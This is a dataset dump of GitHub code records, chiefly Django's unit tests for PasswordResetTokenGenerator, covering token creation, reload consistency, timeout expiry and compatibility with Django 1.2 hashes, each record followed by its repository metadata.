# print f.function_name, len(list(sark.Function(ea=f.function_start).xrefs_to))
|
{
"content_hash": "d1f8186224ef113da39a6250bfba2010",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 93,
"avg_line_length": 33.666666666666664,
"alnum_prop": 0.674000733406674,
"repo_name": "AlexWMF/DIE",
"id": "e09b292449066616f2c90b387271ad38a6c92978",
"size": "3134",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "DIE/Lib/DBUtils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "256348"
}
],
"symlink_target": ""
}
|
from datetime import date, timedelta
from django.conf import settings
from django.contrib.auth.models import User, AnonymousUser
from django.contrib.auth.tokens import PasswordResetTokenGenerator
from django.test import TestCase
class TokenGeneratorTest(TestCase):
    """Tests for PasswordResetTokenGenerator: token round-trips,
    same-request generation, expiry, and Django 1.2 hash compatibility."""
    def test_make_token(self):
        """
        Ensure that we can make a token and that it is valid
        """
        user = User.objects.create_user('tokentestuser', 'test2@example.com', 'testpw')
        p0 = PasswordResetTokenGenerator()
        tk1 = p0.make_token(user)
        self.assertTrue(p0.check_token(user, tk1))
    def test_10265(self):
        """
        Ensure that the token generated for a user created in the same request
        will work correctly.
        """
        # See ticket #10265
        user = User.objects.create_user('comebackkid', 'test3@example.com', 'testpw')
        p0 = PasswordResetTokenGenerator()
        tk1 = p0.make_token(user)
        # Reloading from the DB must yield an identical token.
        reload = User.objects.get(username='comebackkid')
        tk2 = p0.make_token(reload)
        self.assertEqual(tk1, tk2)
    def test_timeout(self):
        """
        Ensure we can use the token after n days, but no greater.
        """
        # Uses a mocked version of PasswordResetTokenGenerator so we can change
        # the value of 'today'
        class Mocked(PasswordResetTokenGenerator):
            def __init__(self, today):
                self._today_val = today
            def _today(self):
                return self._today_val
        user = User.objects.create_user('tokentestuser', 'test2@example.com', 'testpw')
        p0 = PasswordResetTokenGenerator()
        tk1 = p0.make_token(user)
        # Valid exactly at the timeout boundary...
        p1 = Mocked(date.today() + timedelta(settings.PASSWORD_RESET_TIMEOUT_DAYS))
        self.assertTrue(p1.check_token(user, tk1))
        # ...and invalid one day past it.
        p2 = Mocked(date.today() + timedelta(settings.PASSWORD_RESET_TIMEOUT_DAYS + 1))
        self.assertFalse(p2.check_token(user, tk1))
    def test_django12_hash(self):
        """
        Ensure we can use the hashes generated by Django 1.2
        """
        # Hard code in the Django 1.2 algorithm (not the result, as it is time
        # dependent)
        def _make_token(user):
            from django.utils.hashcompat import sha_constructor
            from django.utils.http import int_to_base36
            timestamp = (date.today() - date(2001,1,1)).days
            ts_b36 = int_to_base36(timestamp)
            hash = sha_constructor(settings.SECRET_KEY + unicode(user.id) +
                user.password + user.last_login.strftime('%Y-%m-%d %H:%M:%S') +
                unicode(timestamp)).hexdigest()[::2]
            return "%s-%s" % (ts_b36, hash)
        user = User.objects.create_user('tokentestuser', 'test2@example.com', 'testpw')
        p0 = PasswordResetTokenGenerator()
        tk1 = _make_token(user)
        self.assertTrue(p0.check_token(user, tk1))
|
{
"content_hash": "565dcc151189c1ae68a2a2f06d22768e",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 98,
"avg_line_length": 39.67567567567568,
"alnum_prop": 0.6103542234332425,
"repo_name": "brunogamacatao/portalsaladeaula",
"id": "623e5da66af5119a82c6b4c29481139562902c67",
"size": "2936",
"binary": false,
"copies": "18",
"ref": "refs/heads/master",
"path": "django/contrib/auth/tests/tokens.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "84537"
},
{
"name": "JavaScript",
"bytes": "616811"
},
{
"name": "Python",
"bytes": "4545655"
},
{
"name": "Ruby",
"bytes": "2070"
},
{
"name": "Shell",
"bytes": "53"
}
],
"symlink_target": ""
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.